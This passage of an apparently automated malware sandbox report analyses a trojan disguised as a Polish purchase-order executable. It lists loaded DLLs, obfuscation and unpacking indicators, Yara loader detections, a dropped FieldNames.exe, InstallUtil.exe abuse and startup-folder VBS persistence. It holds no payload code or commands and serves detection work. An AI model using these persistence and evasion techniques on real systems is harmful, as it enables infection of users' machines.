Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msvbvm60.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vb6zz.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.000000000342B000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.0000000004068000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2124472344.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.000000000321E000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2306805654.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: W.pdb4 source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.000000000412F000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.0000000003539000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.0000000004227000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2306805654.0000000004018000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.0000000003317000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3304177579.000000000045B000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.000000000342B000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.0000000004068000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2124472344.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.000000000321E000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2306805654.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, F3SOmS1RfeVd8H521qy.cs

.NET source code contains potential unpacker

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: FieldNames.exe.0.dr, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.3488fa4.1.raw.unpack, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.4799d38.9.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.4799d38.9.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.4799d38.9.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.4799d38.9.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.4799d38.9.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull

Yara detected Costura Assembly Loader

Source: Yara match	File source: 6.2.FieldNames.exe.44d74f8.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.46e74f8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6d80000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2306805654.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2112093538.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2123637208.0000000006D80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2288985162.0000000002E9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe PID: 5760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FieldNames.exe PID: 1272, type: MEMORYSTR

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015E05F8 push eax; ret	0_2_015E0602
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015E0588 push eax; ret	0_2_015E0602
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015E0588 push eax; ret	0_2_015E0612
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015E05B8 push eax; ret	0_2_015E05F2
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015E0618 push eax; ret	0_2_015E0622
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015E0608 push eax; ret	0_2_015E0612
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013C05B8 push eax; ret	6_2_013C05F2
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013C0588 push eax; ret	6_2_013C0602
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013C0588 push eax; ret	6_2_013C0612
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013C05F8 push eax; ret	6_2_013C0602
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013C0618 push eax; ret	6_2_013C0622
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013C0608 push eax; ret	6_2_013C0612
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB55C3 push edx; retf	6_2_05CB55CA
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB55D3 push ebx; retf	6_2_05CB55DA
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB558C push edx; retf	6_2_05CB55A2
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB55AB push eax; retf	6_2_05CB55B6
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB55A3 push ecx; retf	6_2_05CB55AA
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB55B7 push ecx; retf	6_2_05CB55C2
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB4C1B push 00000048h; retf	6_2_05CB4C22
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB3FDB push ds; retf	6_2_05CB3FE1
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB11CB push cs; retf	6_2_05CB11D2
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB406C pushad ; retf	6_2_05CB406D
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB1ACD push ss; retf	6_2_05CB1ACE
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB1AC3 push ss; retf	6_2_05CB1ACA
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB6A2F push esp; retf	6_2_05CB6A35
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_05CB6A38 push 699605CBh; retf	6_2_05CB6A3E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_004024F2 push ds; retf	7_2_0040250D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_004011C5 push 25BF6CCCh; retf	7_2_004011CA

Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, AssemblyLoader.cs	High entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'mImcw49DFTBR2Kc4glt'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, OK20t2DmSFhZLKxJ1Za.cs	High entropy of concatenated method names: 'vqkDwJJFoy', 'wdiDfG456s', 'dlCDRgE2bA', 'YWEDom5NSQ', 'lUuDa6iXa8', 'zm311aolGinfrvCjIOu', 'UWwKxqoAcZQGCAw4v7t', 'tV9GoioIABuhWMxSqth', 'G3xHp4obNpoXAlnrXg3', 'B4n61toH1VV5suyhdsF'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, MWjo8yZPThnGCd2dRnI.cs	High entropy of concatenated method names: 'MPuZSkrj56', 'p0YZ7Y8PQI', 'TyvZNNbyoo', 'AuLZAbOt5M', 'kQcZILSfsu', 'TnTZb7gm5T', 'RlUZHuu0sf', 'WExZcU4sBs', 'NNlZ2eQj74', 'DKgZ4ml6yY'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, qg3O71FzVYe2k3vnArU.cs	High entropy of concatenated method names: 'TxBb3JdYSH', 'sJqbvteI3w', 'BiYbEIKfkn', 'OIFb6HtJo5', 'CHRbiFE01x', 'EyQbUIf0ux', 'C6HbxBSxcs', 'bpv7Jg0Shh', 'MgObXHYWLb', 'GG6bmaR8KN'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, sI2PgIFoi615B5KFe1M.cs	High entropy of concatenated method names: 'yIYFq3PUUE', 'mtLFV546g8', 'tZMFMnkwcm', 'rfdFWDT5V8', 'iqFFG5DkqS', 'MebFnLkBya', 'oaTFO8iwSj', 'RHsFjU9SFY', 'SbKF895fQ0', 'PFXFLFUrZ1'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, F3SOmS1RfeVd8H521qy.cs	High entropy of concatenated method names: 'yDIx0B9KxRLPlWDAa9H', 'sRNQqK99VsPxOTvJQLY', 'MA8FFs65OY', 'aK0nDa9sKbZkFDdRABx', 'uapS7a95TTeO3EHF4ui', 'qfXcWp9pPB2bFtNTbBw', 'sPkJIK9TBdJKUrGmidE', 'mDNUjH9uZNfDLRCKLTw', 'ytDeOL9qFoo1owG0jR3', 'APj8aC9Vvsf7TDvNNne'

Drops PE files

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

File created: C:\Users\user\AppData\Roaming\FieldNames.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FieldNames.vbs

Jump to dropped file

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FieldNames.vbs

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FieldNames.vbs

Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
